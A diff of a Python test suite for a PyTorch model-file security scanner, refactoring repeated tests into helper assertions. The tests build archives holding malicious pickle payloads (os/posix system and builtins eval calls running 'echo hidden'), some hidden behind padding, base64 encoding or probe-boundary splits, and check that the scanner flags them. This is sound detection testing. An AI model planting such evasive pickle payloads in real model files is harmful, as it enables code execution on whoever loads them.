_assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_marks_oversized_frame_payload_incomplete( @@ -3917,20 +3114,7 @@ def test_pytorch_zip_discovery_scans_security_opcode_ending_at_trusted_probe_bou model_path = tmp_path / "referenced_scalar_prefix_global_opcode_boundary.pt" global_opcode = b"cbuiltins\neval\n" storage_blob = b"N." + (b" " * (4096 - 2 - len(global_opcode))) + global_opcode + b"(S'echo hidden'\ntR." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_after_second_trivial_stream_crossing_trusted_probe_boundary( @@ -3938,20 +3122,7 @@ def test_pytorch_zip_discovery_scans_after_second_trivial_stream_crossing_truste ) -> None: model_path = tmp_path / "referenced_scalar_prefix_second_trivial_global_boundary.pt" storage_blob = b"N.I1\n." + (b" " * (4096 - len(b"N.I1\n.") - 5)) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_long_string_trailing_pickle_after_trivial_scalar_prefix( @@ -3959,20 +3130,7 @@ def test_pytorch_zip_discovery_scans_long_string_trailing_pickle_after_trivial_s ) -> None: model_path = tmp_path / "referenced_scalar_prefix_long_string_trailing_pickle.pt" storage_blob = b"N.S'" + (b"A" * 4200) + b"'\n" + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_long_global_operand_crossing_trusted_probe_boundary( @@ -3980,20 +3138,7 @@ def test_pytorch_zip_discovery_scans_long_global_operand_crossing_trusted_probe_ ) -> None: model_path = tmp_path / "referenced_scalar_prefix_long_global_operand_pickle.pt" storage_blob = b"N." + (b"c" * 4094) + b"\nignored\n." + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_padding_at_trusted_probe_boundary( @@ -4001,20 +3146,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_padding_at_trusted_probe_bound ) -> None: model_path = tmp_path / "referenced_scalar_prefix_padding_boundary_pickle.pt" storage_blob = b"N." + (b" " * 4094) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_large_padding_past_trusted_probe_boundary( @@ -4022,20 +3154,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_large_padding_past_trusted_pro ) -> None: model_path = tmp_path / "referenced_scalar_prefix_large_padding_pickle.pt" storage_blob = b"N." + (b" " * 50000) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_expanded_text_padding_prefix( @@ -4043,20 +3162,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_expanded_text_padding_prefix( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_expanded_text_padding_pickle.pt" storage_blob = b"N." + (b" " * 65536) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_expanded_nul_padding_prefix( @@ -4064,20 +3170,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_expanded_nul_padding_prefix( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_expanded_nul_padding_pickle.pt" storage_blob = b"N." + (b"\x00" * 65536) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_nul_padding_with_bad_storage_crc( @@ -4109,20 +3202,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_nul_padding_with_bad_storage_c def test_pytorch_zip_discovery_skips_complete_text_padding_prefix(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_scalar_prefix_complete_text_padding.pt" - storage_blob = b"N." + (b" " * 5002) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert result.success is True - assert result.metadata.get("pickle_verdict") == "clean" - assert result.metadata["pickle_files"] == ["archive/data.pkl"] - assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + _assert_storage_padding_clean(tmp_path, ("referenced_scalar_prefix_complete_text_padding.pt"), (b" "), (5002)) def test_pytorch_zip_discovery_scans_pickle_after_unfinished_trivial_opcode_run( @@ -4130,20 +3210,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_unfinished_trivial_opcode_run( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_unfinished_trivial_run_pickle.pt" storage_blob = b"N." + (b"N" * 4094) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_repeated_trivial_streams( @@ -4151,20 +3218,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_repeated_trivial_streams( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_repeated_trivial_streams_pickle.pt" storage_blob = (b"N." * 600) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_repeated_trivial_streams_past_trusted_probe( @@ -4172,20 +3226,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_repeated_trivial_streams_past_ ) -> None: model_path = tmp_path / "referenced_scalar_prefix_long_repeated_trivial_streams_pickle.pt" storage_blob = (b"N." * 2048) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_pickle_after_many_trivial_int_streams( @@ -4193,20 +3234,7 @@ def test_pytorch_zip_discovery_scans_pickle_after_many_trivial_int_streams( ) -> None: model_path = tmp_path / "referenced_scalar_prefix_many_trivial_int_streams_pickle.pt" storage_blob = b"N." + (b"I1\n." * 1200) + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_proto0_string_operand_split_at_trusted_probe_boundary( @@ -4220,20 +3248,7 @@ def test_pytorch_zip_discovery_scans_proto0_string_operand_split_at_trusted_prob ) assert len(storage_prefix) == pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + b"'tensor-name'\n." + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_skips_benign_proto0_string_operand_split_at_trusted_probe_boundary( @@ -4283,20 +3298,7 @@ def test_pytorch_zip_discovery_scans_truncated_memo_operand_after_trivial_stream ) assert len(storage_prefix) == pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + memo_suffix + _malicious_proto0_system_payload() - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_truncated_inst_operand_after_trivial_stream_at_trusted_probe_boundary( @@ -4420,20 +3422,7 @@ def test_pytorch_zip_discovery_scans_malformed_separator_at_trusted_probe_bounda ) assert len(storage_prefix) == pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_does_not_route_benign_getattr_literal_storage(tmp_path: Path) -> None: @@ -4458,39 +3447,13 @@ def test_pytorch_zip_discovery_does_not_route_benign_getattr_literal_storage(tmp def test_pytorch_zip_discovery_scans_scalar_literal_with_raw_nested_pickle(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_raw_nested_pickle.pt" storage_blob = b"S'AAAAAAcos\\x0asystem\\x0a)R.BBBB'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_scalar_literal_with_encoded_nested_pickle(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_encoded_nested_pickle.pt" storage_blob = b"S'" + base64.b64encode(_malicious_proto0_system_payload()) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_routes_binunicode8_literal_after_trivial_prefix(tmp_path: Path) -> None: @@ -4572,20 +3535,7 @@ def test_pytorch_zip_discovery_scans_shifted_base64_scalar_literal_nested_pickle model_path = tmp_path / "referenced_scalar_literal_shifted_encoded_nested_pickle.pt" nested_payload = _malicious_proto0_system_payload() storage_blob = b"S'" + (b"A" * 65) + base64.b64encode(nested_payload) + (b"A" * 64) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_padded_base64_scalar_before_following_token(tmp_path: Path) -> None: @@ -4593,20 +3543,7 @@ def test_pytorch_zip_discovery_scans_padded_base64_scalar_before_following_token malicious = base64.b64encode(b"cposix\nsystem\n)R.") assert malicious.endswith(b"=") storage_blob = b"S'" + malicious + base64.b64encode(b"benign") + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_padded_base64_scalar_before_short_suffix(tmp_path: Path) -> None: @@ -4614,20 +3551,7 @@ def test_pytorch_zip_discovery_scans_padded_base64_scalar_before_short_suffix(tm malicious = base64.b64encode(b"cposix\nsystem\n)R.") assert malicious.endswith(b"=") storage_blob = b"S'" + malicious + b"AAAA" + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_padded_base64_scalar_between_following_tokens(tmp_path: Path) -> None: @@ -4637,20 +3561,7 @@ def test_pytorch_zip_discovery_scans_padded_base64_scalar_between_following_toke assert safe_prefix.endswith(b"=") assert malicious.endswith(b"=") storage_blob = b"S'" + safe_prefix + malicious + base64.b64encode(b"benign") + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_skips_padded_base64_scalar_near_match(tmp_path: Path) -> None: @@ -4713,60 +3624,21 @@ def test_pytorch_zip_discovery_scans_scalar_literal_before_trailing_trivial_stre model_path = tmp_path / "referenced_scalar_literal_before_trailing_trivial_stream.pt" nested_payload = _malicious_proto0_system_payload() storage_blob = b"S'" + base64.b64encode(nested_payload) + b"'\n.N." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_scalar_literal_after_trivial_stream(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_after_trivial_stream.pt" nested_payload = _malicious_proto0_system_payload() storage_blob = b"N.S'" + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_scalar_literal_after_clean_nontrivial_stream(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_after_clean_nontrivial_stream.pt" nested_payload = _malicious_proto0_system_payload() storage_blob = b"N.]\x85.S'" + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_preserves_suspicious_literal_after_trivial_stream( @@ -4794,39 +3666,13 @@ def test_pytorch_zip_discovery_preserves_suspicious_literal_after_trivial_stream def test_pytorch_zip_discovery_scans_scalar_literal_after_benign_binary_prefix(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_after_benign_binary_prefix.pt" storage_blob = _proto0_string_literal(b"\x80\x04N.\xff" + _malicious_proto0_system_payload()) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_scalar_literal_with_escaped_binary_nested_pickle(tmp_path: Path) -> None: model_path = tmp_path / "referenced_scalar_literal_escaped_binary_nested_pickle.pt" storage_blob = _proto0_string_literal(_malicious_eval_pickle_payload()) - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_scalar_literal_with_suspicious_string(tmp_path: Path) -> None: @@ -4941,20 +3787,7 @@ def test_pytorch_zip_discovery_scans_initial_scalar_literal_split_at_probe_bound storage_prefix = b"S'" + (b"A" * (pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES - len(b"S'"))) assert len(storage_prefix) == pytorch_zip_scanner_module._TRUSTED_STORAGE_PICKLE_PROBE_BYTES storage_blob = storage_prefix + base64.b64encode(nested_payload) + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_frame_first_scalar_literal_with_encoded_nested_pickle( @@ -4964,20 +3797,7 @@ def test_pytorch_zip_discovery_scans_frame_first_scalar_literal_with_encoded_nes nested_payload = base64.b64encode(b"cposix\nsystem\n(S'echo hidden'\ntR.") frame_payload = b"\x8c" + bytes([len(nested_payload)]) + nested_payload + b"." storage_blob = b"\x95" + len(frame_payload).to_bytes(8, "little") + frame_payload - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_scans_headerless_binary_nested_pickle_literal( @@ -4986,37 +3806,12 @@ def test_pytorch_zip_discovery_scans_headerless_binary_nested_pickle_literal( model_path = tmp_path / "referenced_headerless_binary_literal_nested_pickle.pt" nested_payload = base64.b64encode(b"\x8c\x02os\x8c\x06system\x93)R.") storage_blob = b"S'" + nested_payload + b"'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert "archive/data/0" in result.metadata["pickle_files"] - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == "archive/data/0" - for issue in result.issues - ) + _assert_referenced_storage_critical(model_path, storage_blob) def test_pytorch_zip_discovery_skips_headerless_binary_literal_near_match(tmp_path: Path) -> None: - model_path = tmp_path / "referenced_headerless_binary_literal_near_match.pt" - storage_blob = b"S'\x8c\x02ok\x94.'\n." - storage_blob += b" " * (-len(storage_blob) % 4) - with zipfile.ZipFile(model_path, "w") as zip_file: - zip_file.writestr("archive/version", "3\n") - zip_file.writestr("archive/byteorder", "little") - zip_file.writestr("archive/data.pkl", _float_storage_persistent_id_payload_for_bytes("0", storage_blob)) - zip_file.writestr("archive/data/0", storage_blob) - - result = PyTorchZipScanner().scan(str(model_path)) - - assert not any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("pickle_filename") == 